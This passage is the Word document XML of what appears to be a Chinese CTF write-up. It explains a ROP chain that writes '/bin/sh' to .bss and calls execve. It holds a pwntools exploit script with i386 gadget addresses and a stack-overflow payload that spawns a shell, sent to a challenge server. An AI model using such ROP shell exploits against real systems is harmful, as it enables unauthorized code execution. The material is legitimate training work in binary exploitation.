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CE5C" w14:textId="3E6BD306" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过 ROP 链将 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字符串写入可写内存（.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），然后调用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 系统调用获取 shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FE30D" w14:textId="24C3E487" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABC0CA" w14:textId="59219A31" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00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150FE3F2" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA8773C" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00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context.arch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'i386'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2F4BD" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA3DC7D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# ========== Gadgets ==========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E7B7B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POP_EAX     = 0x080491a6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3EFE2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POP_EBX     = 0x08049022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E766E8B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POP_ECX_EBX = 0x080491b0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307BA23D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POP_EDX     = 0x080491b6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BCC8A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MOV_EDX_EAX = 0x080491bb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B27D75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INT_0x80    = 0x080491c1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6EF51" w14:textId="08EA4C5B" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WRITABLE = 0x0804B360  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25381890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* (0x48+4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A02BC72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p32(POP_EDX) + p32(WRITABLE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604284C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p32(POP_EAX) + b'/bin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088ABF02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p32(MOV_EDX_EAX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE6992" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B4E893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p32(POP_EDX) + p32(WRITABLE + 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714AFD68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p32(POP_EAX) + b'/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\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E86CDA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p32(MOV_EDX_EAX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4D185" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2506AB7E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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execve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", NULL, NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEDC1E4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p32(POP_EAX) + p32(0xb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33F563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p32(POP_ECX_EBX) + p32(0) + p32(WRITABLE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53599B39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lastRenderedPageBreak/>
        <w:t>payload += p32(POP_EDX) + p32(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4C5C1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>payload += p32(INT_0x80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE653A" w14:textId="07F48C66" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7E3E9C" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr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'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>challenge.cyclens</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 30176)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA7FE1" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5138B686" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00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b"Input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF2014" w14:textId="77777777" w:rsidR="00892C00" w:rsidRDefault="00892C00" w:rsidP="00892C00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p.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EE655" w14:textId="4A3E5A3C" w:rsidR="00DE20B3" w:rsidRDefault="00892C00" w:rsidP="00892C00"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sectPr w:rsidR="00DE2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3C3F5" w14:textId="77777777" w:rsidR="00C21C79" w:rsidRDefault="00C21C79" w:rsidP="00892C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D5C8A9" w14:textId="77777777" w:rsidR="00C21C79" w:rsidRDefault="00C21C79" w:rsidP="00892C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BEA7" w14:textId="77777777" w:rsidR="00C21C79" w:rsidRDefault="00C21C79" w:rsidP="00892C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EE88F1" w14:textId="77777777" w:rsidR="00C21C79" w:rsidRDefault="00C21C79" w:rsidP="00892C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B3"/>
    <w:rsid w:val="004949C0"/>
    <w:rsid w:val="00892C00"/>
    <w:rsid w:val="00C21C79"/>
    <w:rsid w:val="00DE20B3"/>
    <w:rsid w:val="00F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29D96"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BF0ED428-A596-4B9C-B900-7D45CE50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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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20B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2C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2C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2C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2C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2026-05-23T08:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-23T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>